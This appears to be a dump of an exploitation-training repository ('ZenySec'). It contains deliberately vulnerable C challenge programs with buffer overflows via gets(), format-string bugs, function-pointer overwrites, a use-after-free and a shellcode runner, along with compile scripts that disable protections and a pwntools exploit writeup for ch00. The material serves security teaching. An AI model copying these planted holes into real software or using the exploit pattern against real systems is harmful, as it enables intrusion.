if(!(strcmp(l.admin, "true"))){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch01!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /exercises-i386/ch01/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch01.c -static -no-pie -o $1/ch01 2 | -------------------------------------------------------------------------------- /exercises-i386/ch01/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch02/ch02.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | void (*hook)(); 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .hook = 0}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | 28 | if(l.hook){ 29 | l.hook(); 30 | } 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, char **argv){ 61 | setbuf(stdout, NULL); 62 | uid_t uid = geteuid(); 63 | setresuid(uid,uid,uid); 64 | printf("Welcome to ch02!\n"); 65 | while(1){ 66 | if (!(menu())){ 67 | break; 68 | } 69 | printf("\n"); 70 | } 71 | printf("Exiting...\n"); 72 | } 73 | -------------------------------------------------------------------------------- /exercises-i386/ch02/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch02.c -static -no-pie -o $1/ch02 2 | -------------------------------------------------------------------------------- /exercises-i386/ch02/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch03/ch03.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE] = {0}; 14 | char content[BUF_SIZE] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE, stdin); 19 | printf("Enter message content:"); 20 | gets(content); 21 | 22 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 23 | } 24 | 25 | int menu(){ 26 | char buffer[BUF_SIZE] = {0}; 27 | 28 | printf("[*] menu\n"); 29 | printf("menu - show this menu\n"); 30 | printf("send - send new message\n"); 31 | printf("exit - close program\n"); 32 | 33 | fgets(buffer, BUF_SIZE, stdin); 34 | 35 | if (strcmp(buffer, "menu\n") == 0){ 36 | return 1; 37 | } 38 | else if (strcmp(buffer, "send\n") == 0){ 39 | send(); 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "exit\n") == 0){ 43 | return 0; 44 | } 45 | else{ 46 | printf("Unknown command: %s", buffer); 47 | return 1; 48 | } 49 | 50 | } 51 | 52 | int main(int argc, char **argv){ 53 | setbuf(stdout, NULL); 54 | uid_t uid = geteuid(); 55 | setresuid(uid,uid,uid); 56 | printf("Welcome to ch03!\n"); 57 | while(1){ 58 | if (!(menu())){ 59 | break; 60 | } 61 | printf("\n"); 62 | } 63 | printf("Exiting...\n"); 64 | } 65 | -------------------------------------------------------------------------------- /exercises-i386/ch03/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03 2 | -------------------------------------------------------------------------------- /exercises-i386/ch03/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch04/ch04.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char content[BUF_SIZE*2] = "dummy"; 9 | char perm[BUF_SIZE*2] = "user"; 10 | 11 | void secret(){ 12 | system("cat flag"); 13 | } 14 | 15 | void send(){ 16 | char name[BUF_SIZE] = {0}; 17 | printf("Creating message\n"); 18 | printf("Enter message name:"); 19 | fgets(name, BUF_SIZE*2, stdin); 20 | printf("Enter message content:"); 21 | gets(content); 22 | 23 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 24 | if(strcmp(perm, "root") == 0){ 25 | secret(); 26 | } 27 | } 28 | 29 | int menu(){ 30 | char buffer[BUF_SIZE] = {0}; 31 | 32 | printf("[*] menu\n"); 33 | printf("menu - show this menu\n"); 34 | printf("send - send new message\n"); 35 | printf("exit - close program\n"); 36 | 37 | fgets(buffer, BUF_SIZE, stdin); 38 | 39 | if (strcmp(buffer, "menu\n") == 0){ 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "send\n") == 0){ 43 | send(); 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "exit\n") == 0){ 47 | return 0; 48 | } 49 | else{ 50 | printf("Unknown command: %s", buffer); 51 | return 1; 52 | } 53 | 54 | } 55 | 56 | int main(int argc, char **argv){ 57 | setbuf(stdout, NULL); 58 | uid_t uid = geteuid(); 59 | setresuid(uid,uid,uid); 60 | printf("Welcome to ch04!\n"); 61 | while(1){ 62 | if (!(menu())){ 63 | break; 64 | } 65 | printf("\n"); 66 | } 67 | printf("Exiting...\n"); 68 | } 69 | -------------------------------------------------------------------------------- /exercises-i386/ch04/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch04.c -static -no-pie -o $1/ch04 2 | -------------------------------------------------------------------------------- /exercises-i386/ch04/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch05/ch05.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE*2] = {0}; 14 | char content[BUF_SIZE*2] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE*2, stdin); 19 | printf("Enter message content:"); 20 | fgets(content, BUF_SIZE*2, stdin); 21 | 22 | printf("name: \"%s\"\ncontent:\"", name); 23 | printf(content); 24 | printf("\"\n"); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch05!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | exit(1); 67 | } 68 | -------------------------------------------------------------------------------- /exercises-i386/ch05/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch05.c -static -no-pie -o $1/ch05 2 | -------------------------------------------------------------------------------- /exercises-i386/ch05/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch06/ch06.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #define BUF_SIZE 50 9 | #define PAGE_SIZE 4096 10 | 11 | void runner(){ 12 | char content[PAGE_SIZE]; 13 | char *code; 14 | 15 | printf("Enter byte to run:"); 16 | fgets(content, PAGE_SIZE, stdin); 17 | 18 | code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 19 | memcpy(code, content, PAGE_SIZE); 20 | 21 | mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC); 22 | 23 | void (*func)() = (void (*)())code; 24 | func(); 25 | 26 | munmap(code, PAGE_SIZE); 27 | } 28 | 29 | void send(){ 30 | char name[BUF_SIZE] = {0}; 31 | char content[BUF_SIZE] = {0}; 32 | 33 | printf("Creating message\n"); 34 | printf("Enter message name:"); 35 | fgets(name, BUF_SIZE, stdin); 36 | printf("Enter message content:"); 37 | fgets(content, BUF_SIZE, stdin); 38 | 39 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 40 | } 41 | 42 | int menu(){ 43 | char buffer[BUF_SIZE] = {0}; 44 | 45 | printf("[*] menu\n"); 46 | printf("menu - show this menu\n"); 47 | printf("send - send new message\n"); 48 | printf("runner - run bytes\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "runner\n") == 0){ 61 | runner(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | uid_t uid = geteuid(); 77 | setresuid(uid,uid,uid); 78 | printf("Welcome to ch06!\n"); 79 | while(1){ 80 | if (!(menu())){ 81 | break; 82 | } 83 | printf("\n"); 84 | } 85 | printf("Exiting...\n"); 86 | } 87 | -------------------------------------------------------------------------------- /exercises-i386/ch06/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch06.c -static -no-pie -o $1/ch06 2 | -------------------------------------------------------------------------------- /exercises-i386/ch06/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch07/ch07.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char str[BUF_SIZE] = "/bin/sh\x00"; 9 | 10 | void func(){ 11 | system("ls"); 12 | } 13 | 14 | void send(){ 15 | char name[BUF_SIZE] = {0}; 16 | char content[BUF_SIZE] = {0}; 17 | 18 | printf("Creating message\n"); 19 | printf("Enter message name:"); 20 | fgets(name, BUF_SIZE, stdin); 21 | printf("Enter message content:"); 22 | gets(content); 23 | 24 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch07!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | } 67 | -------------------------------------------------------------------------------- /exercises-i386/ch07/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07 2 | -------------------------------------------------------------------------------- /exercises-i386/ch07/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch08/ch08.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void send(){ 9 | char name[BUF_SIZE] = {0}; 10 | char content[BUF_SIZE] = {0}; 11 | 12 | printf("Creating message\n"); 13 | printf("Enter message name:"); 14 | fgets(name, BUF_SIZE, stdin); 15 | printf("Enter message content:"); 16 | gets(content); 17 | 18 | printf("name: \""); 19 | printf(name); 20 | printf("\"\ncontent:\"%s\"\n", content); 21 | } 22 | 23 | int menu(){ 24 | char buffer[BUF_SIZE] = {0}; 25 | 26 | printf("[*] menu\n"); 27 | printf("menu - show this menu\n"); 28 | printf("send - send new message\n"); 29 | printf("exit - close program\n"); 30 | 31 | fgets(buffer, BUF_SIZE, stdin); 32 | 33 | if (strcmp(buffer, "menu\n") == 0){ 34 | return 1; 35 | } 36 | else if (strcmp(buffer, "send\n") == 0){ 37 | send(); 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "exit\n") == 0){ 41 | return 0; 42 | } 43 | else{ 44 | printf("Unknown command: %s", buffer); 45 | return 1; 46 | } 47 | 48 | } 49 | 50 | int main(int argc, char **argv){ 51 | setbuf(stdout, NULL); 52 | uid_t uid = geteuid(); 53 | setresuid(uid,uid,uid); 54 | printf("Welcome to ch08!\n"); 55 | while(1){ 56 | if (!(menu())){ 57 | break; 58 | } 59 | printf("\n"); 60 | } 61 | printf("Exiting...\n"); 62 | } 63 | -------------------------------------------------------------------------------- /exercises-i386/ch08/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch08.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch08 2 | -------------------------------------------------------------------------------- /exercises-i386/ch08/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch09/ch09.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | void secret(){ 20 | system("cat flag"); 21 | } 22 | 23 | void send(){ 24 | 25 | message* msg = (message*) malloc(sizeof(message)); 26 | important* object_01 = (important*) malloc(sizeof(important)); 27 | 28 | printf("Creating message\n"); 29 | printf("Enter message name:"); 30 | fgets(msg->name, BUF_SIZE, stdin); 31 | printf("Enter message content:"); 32 | gets(msg->content); 33 | 34 | if (object_01->func_ptr){ 35 | object_01->func_ptr(); 36 | } 37 | 38 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 39 | } 40 | 41 | int menu(){ 42 | char buffer[BUF_SIZE] = {0}; 43 | 44 | printf("[*] menu\n"); 45 | printf("menu - show this menu\n"); 46 | printf("send - send new message\n"); 47 | printf("exit - close program\n"); 48 | 49 | fgets(buffer, BUF_SIZE, stdin); 50 | 51 | if (strcmp(buffer, "menu\n") == 0){ 52 | return 1; 53 | } 54 | else if (strcmp(buffer, "send\n") == 0){ 55 | send(); 56 | return 1; 57 | } 58 | else if (strcmp(buffer, "exit\n") == 0){ 59 | return 0; 60 | } 61 | else{ 62 | printf("Unknown command: %s", buffer); 63 | return 1; 64 | } 65 | 66 | } 67 | 68 | int main(int argc, char **argv){ 69 | setbuf(stdout, NULL); 70 | uid_t uid = geteuid(); 71 | setresuid(uid,uid,uid); 72 | printf("Welcome to ch09!\n"); 73 | while(1){ 74 | if (!(menu())){ 75 | break; 76 | } 77 | printf("\n"); 78 | } 79 | printf("Exiting...\n"); 80 | } 81 | -------------------------------------------------------------------------------- /exercises-i386/ch09/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch09.c -static -no-pie -o $1/ch09 2 | -------------------------------------------------------------------------------- /exercises-i386/ch09/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch10/ch10.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | important* work; 20 | 21 | void func(){ 22 | printf("[*] Working\n"); 23 | } 24 | 25 | void secret(){ 26 | system("cat flag"); 27 | } 28 | 29 | void create_worker(){ 30 | work = (important*) malloc(sizeof(important)); 31 | work->func_ptr = func; 32 | printf("Worker Created in %p\n", work); 33 | } 34 | 35 | void start_worker(){ 36 | work->func_ptr(); 37 | } 38 | 39 | void free_worker(){ 40 | free(work); 41 | } 42 | 43 | void send(){ 44 | message* msg = (message*) malloc(sizeof(message)); 45 | printf("Message Created in %p\n", msg); 46 | 47 | printf("Creating message\n"); 48 | printf("Enter message name:"); 49 | fgets(msg->name, BUF_SIZE, stdin); 50 | printf("Enter message content:"); 51 | gets(msg->content); 52 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 53 | } 54 | 55 | int menu(){ 56 | char buffer[BUF_SIZE] = {0}; 57 | 58 | printf("[*] menu\n"); 59 | printf("menu - show this menu\n"); 60 | printf("send - send new message\n"); 61 | printf("create_worker - create worker\n"); 62 | printf("start_worker - run worker\n"); 63 | printf("free_worker - free current worker\n"); 64 | printf("exit - close program\n"); 65 | 66 | fgets(buffer, BUF_SIZE, stdin); 67 | 68 | if (strcmp(buffer, "menu\n") == 0){ 69 | return 1; 70 | } 71 | else if (strcmp(buffer, "create_worker\n") == 0){ 72 | create_worker(); 73 | return 1; 74 | } 75 | else if (strcmp(buffer, "start_worker\n") == 0){ 76 | start_worker(); 77 | return 1; 78 | } 79 | else if (strcmp(buffer, "free_worker\n") == 0){ 80 | free_worker(); 81 | return 1; 82 | } 83 | else if (strcmp(buffer, "send\n") == 0){ 84 | send(); 85 | return 1; 86 | } 87 | else if (strcmp(buffer, "exit\n") == 0){ 88 | return 0; 89 | } 90 | else{ 91 | printf("Unknown command: %s", buffer); 92 | return 1; 93 | } 94 | 95 | } 96 | 97 | int main(int argc, char **argv){ 98 | setbuf(stdout, NULL); 99 | uid_t uid = geteuid(); 100 | setresuid(uid,uid,uid); 101 | printf("Welcome to ch10!\n"); 102 | while(1){ 103 | if (!(menu())){ 104 | break; 105 | } 106 | printf("\n"); 107 | } 108 | printf("Exiting...\n"); 109 | } 110 | -------------------------------------------------------------------------------- /exercises-i386/ch10/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch10.c -static -no-pie -o $1/ch10 2 | -------------------------------------------------------------------------------- /exercises-i386/ch10/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/motd: -------------------------------------------------------------------------------- 1 | 2 | ZenySec 3 | 4 | 5 | -------------------------------------------------------------------------------- /exercises-i386/welcome/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/welcome.c -no-pie -o $1/welcome 2 | -------------------------------------------------------------------------------- /exercises-i386/welcome/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/welcome/welcome.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char **argv){ 7 | uid_t uid = geteuid(); 8 | setresuid(uid,uid,uid); 9 | system("cat flag"); 10 | } 11 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | import argparse 4 | import os 5 | from DockerFile import DockerFile 6 | from ChallengeBuild import ChallengeBuild 7 | 8 | 9 | def main(port, arch, docker_name, aslr, directory=None, no_cache=False, 10 | build_run=False): 11 | if not directory: 12 | directory = os.getcwd() 13 | 14 | with ChallengeBuild(directory=directory, arch=arch, aslr=aslr) as challenge_handle: 15 | if build_run: 16 | if not docker_name: 17 | raise Exception("missing docker name") 18 | with DockerFile(sources=challenge_handle.sources, docker_name=docker_name, no_cache=no_cache, 19 | build_run=build_run, port=port, arch=arch, aslr=aslr) as docker_handle: 20 | print docker_handle.docker_name 21 | interactive = raw_input('execute `rm -f ~/.ssh/known_hosts` y/n?') 22 | if interactive == 'y': 23 | print 'rm -f ~/.ssh/known_hosts' 24 | os.system('rm -f ~/.ssh/known_hosts') 25 | 26 | 27 | if __name__ == '__main__': 28 | parser = argparse.ArgumentParser(description='ZenySec Exploitation Exercises') 29 | parser.add_argument('-dir', '--directory', help='main directory', required=False, dest='directory') 30 | 31 | parser.add_argument('-d', '--docker-name', help='docker name', required=True, dest='docker_name') 32 | parser.add_argument('-ca', '--no-cache', help='use cache when building docker', required=False, dest='no_cache', 33 | action='store_true') 34 | parser.add_argument('-r', '--build-run', help='build and run docker', required=False, dest='build_run', 35 | action='store_true') 36 | parser.add_argument('-p', '--port', help='running docker port', required=True, dest='port') 37 | 38 | parser.add_argument('-a', '--architecture', help='i386/arm32v7', required=True, dest='arch') 39 | 40 | parser.add_argument('-as', '--aslr', help='yes/no', required=True, dest='aslr') 41 | main(**vars(parser.parse_args())) 42 | -------------------------------------------------------------------------------- /qemu-arm-static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/qemu-arm-static -------------------------------------------------------------------------------- /writeups/arm32v7/ArmExploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | 5 | 6 | class ArmExploit(object): 7 | def __init__(self, challenge_name, execution, debug_port=20000, remote_port=20000): 8 | self.r = None 9 | if execution == 'debug': 10 | r = process(['qemu-arm-static', '-g', '{port}'.format(port=debug_port), './{challenge_name}'.format(challenge_name=challenge_name)]) 11 | log.info('xhelp - help in gdb') 12 | os.system('x-terminal-emulator -e "gdb-multiarch -x ../gdb_plugin.sh {challenge_name}"'.format( 13 | challenge_name=challenge_name)) 14 | elif execution == 'local': 15 | r = process(['qemu-arm-static', './{challenge_name}'.format(challenge_name=challenge_name)]) 16 | elif execution == 'remote': 17 | ssh_client = ssh(user=challenge_name, host='exercises-arm32v7.zenysec.com', port=remote_port, 18 | password=challenge_name) 19 | r = ssh_client.process(['./{challenge_name}'.format(challenge_name=challenge_name)]) 20 | else: 21 | log.error('Unknown execution type {execution}'.format(execution=execution)) 22 | raise Exception('ArmExploit: Unknown execution type {execution}'.format(execution=execution)) 23 | self.r = r 24 | 25 | -------------------------------------------------------------------------------- /writeups/arm32v7/ArmExploit.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ArmExploit.pyc -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/ch00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch00/ch00 -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/ch00.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char value; 17 | }; 18 | struct locals l = {.value = 0, .content = {0}, .name = {0}}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(l.value == 0x7){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch00!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch00.c -static -no-pie -o $1/ch00 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch00' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(0x7, word_size=32)) 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch00') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/ch01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch01/ch01 -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/ch01.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char admin[BUF_SIZE]; 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .admin = "false"}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(!(strcmp(l.admin, "true"))){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | 